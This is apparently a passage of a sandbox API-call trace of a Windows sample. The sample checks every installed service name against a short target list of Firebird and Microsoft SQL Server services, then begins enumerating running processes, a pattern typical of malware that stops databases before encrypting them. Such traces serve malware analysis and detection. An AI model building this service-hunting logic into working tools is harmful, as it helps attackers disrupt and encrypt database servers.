1 [0174.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0174.333] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0174.333] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0174.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0174.333] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0174.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0174.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0174.333] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0174.333] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0174.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0174.333] lstrlenW (lpString="CDPSvc") returned 6 [0174.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0174.333] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0174.333] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0174.333] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0174.333] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0174.333] lstrlenW (lpString="ClickToRunSvc") returned 13 [0174.333] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0174.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0174.334] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0174.334] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0174.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0174.334] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0174.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0174.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0174.334] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0174.334] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0174.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0174.334] lstrlenW (lpString="CryptSvc") returned 8 [0174.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0174.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0174.334] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0174.334] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0174.334] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0174.334] lstrlenW (lpString="DcomLaunch") returned 10 [0174.334] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0174.334] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0174.334] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0174.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0174.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0174.335] lstrlenW (lpString="DeviceAssociationService") returned 24 [0174.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0174.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0174.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0174.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0174.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0174.335] lstrlenW (lpString="Dhcp") returned 4 [0174.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0174.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0174.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0174.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0174.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0174.335] lstrlenW (lpString="Dnscache") returned 8 [0174.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0174.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0174.335] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0174.335] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0174.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0174.335] lstrlenW (lpString="DPS") returned 3 [0174.335] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0174.335] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0174.335] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0174.335] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0174.335] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0174.336] lstrlenW (lpString="DusmSvc") returned 7 [0174.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0174.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0174.336] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0174.336] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0174.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0174.336] lstrlenW (lpString="EventLog") returned 8 [0174.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0174.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0174.336] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0174.336] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0174.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0174.336] lstrlenW (lpString="EventSystem") returned 11 [0174.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0174.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0174.336] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0174.336] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0174.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0174.336] lstrlenW (lpString="FontCache") returned 9 [0174.336] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0174.336] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0174.336] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0174.336] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0174.336] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0174.337] lstrlenW (lpString="gpsvc") returned 5 [0174.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0174.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0174.337] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0174.337] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0174.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0174.337] lstrlenW (lpString="iphlpsvc") returned 8 [0174.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0174.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0174.337] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0174.337] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0174.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0174.337] lstrlenW (lpString="KeyIso") returned 6 [0174.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0174.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0174.337] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0174.337] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0174.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0174.337] lstrlenW (lpString="LanmanServer") returned 12 [0174.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0174.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0174.337] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0174.337] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0174.337] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0174.337] lstrlenW (lpString="LanmanWorkstation") returned 17 [0174.337] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0174.337] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0174.337] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0174.338] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0174.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0174.338] lstrlenW (lpString="lfsvc") returned 5 [0174.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0174.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0174.338] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0174.338] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0174.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0174.338] lstrlenW (lpString="lmhosts") returned 7 [0174.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0174.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0174.338] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0174.338] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0174.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0174.338] lstrlenW (lpString="LSM") returned 3 [0174.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0174.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0174.338] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0174.338] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0174.338] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0174.338] lstrlenW (lpString="MpsSvc") returned 6 [0174.338] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0174.338] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0174.338] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0174.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0174.339] lstrlenW (lpString="NcbService") returned 10 [0174.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0174.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0174.339] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0174.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0174.339] lstrlenW (lpString="netprofm") returned 8 [0174.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0174.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0174.339] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0174.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0174.339] lstrlenW (lpString="NgcSvc") returned 6 [0174.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0174.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0174.339] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0174.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0174.339] lstrlenW (lpString="NlaSvc") returned 6 [0174.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0174.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0174.339] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0174.339] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0174.339] lstrlenW (lpString="nsi") returned 3 [0174.339] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0174.339] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0174.339] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0174.339] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0174.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0174.340] lstrlenW (lpString="PcaSvc") returned 6 [0174.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0174.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0174.340] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0174.340] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0174.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0174.340] lstrlenW (lpString="PlugPlay") returned 8 [0174.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0174.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0174.340] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0174.340] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0174.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0174.340] lstrlenW (lpString="Power") returned 5 [0174.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0174.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0174.340] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0174.340] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0174.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0174.340] lstrlenW (lpString="ProfSvc") returned 7 [0174.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0174.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0174.340] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0174.340] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0174.340] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0174.340] lstrlenW (lpString="RpcEptMapper") returned 12 [0174.340] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0174.340] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0174.341] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0174.341] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0174.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0174.341] lstrlenW (lpString="RpcSs") returned 5 [0174.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0174.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0174.341] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0174.341] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0174.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0174.341] lstrlenW (lpString="SamSs") returned 5 [0174.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0174.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0174.341] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0174.341] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0174.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0174.341] lstrlenW (lpString="Schedule") returned 8 [0174.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0174.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0174.341] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0174.341] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0174.341] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0174.341] lstrlenW (lpString="SecurityHealthService") returned 21 [0174.341] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0174.341] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0174.341] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0174.341] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0174.342] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0174.342] lstrlenW (lpString="SENS") returned 4 [0174.342] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0174.342] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0174.342] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0174.342] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0174.342] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0174.342] lstrlenW (lpString="ShellHWDetection") returned 16 [0174.342] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0174.342] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0174.342] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0174.342] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0174.342] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0174.342] lstrlenW (lpString="Spooler") returned 7 [0174.342] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0174.342] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0174.342] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0174.342] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0174.342] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0174.342] lstrlenW (lpString="StateRepository") returned 15 [0174.342] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0174.342] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0174.342] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0174.342] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0174.342] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0174.342] lstrlenW (lpString="SysMain") returned 7 [0174.342] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0174.343] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0174.343] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0174.343] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0174.343] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0174.343] lstrlenW (lpString="SystemEventsBroker") returned 18 [0174.343] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0174.343] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0174.343] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0174.343] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0174.343] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0174.343] lstrlenW (lpString="Themes") returned 6 [0174.343] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0174.343] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0174.343] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0174.343] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0174.343] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0174.343] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0174.343] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0174.343] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0174.343] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0174.343] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0174.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ff6f8 | out: hHeap=0x6a0000) returned 1 [0174.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0174.348] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.349] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.349] lstrlenW (lpString="System") returned 6 [0174.350] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.351] lstrlenW (lpString="smss.exe") returned 8 [0174.351] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.352] lstrlenW (lpString="csrss.exe") returned 9 [0174.352] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.352] lstrlenW (lpString="wininit.exe") returned 11 [0174.353] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.738] lstrlenW (lpString="csrss.exe") returned 9 [0174.738] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.739] lstrlenW (lpString="winlogon.exe") returned 12 [0174.739] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.740] lstrlenW (lpString="services.exe") returned 12 [0174.740] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.741] lstrlenW (lpString="lsass.exe") returned 9 [0174.742] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0174.743] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0174.743] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0174.744] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0174.744] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.745] lstrlenW (lpString="svchost.exe") returned 11 [0174.745] Process32NextW (in: hSnapshot=0x3ac, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 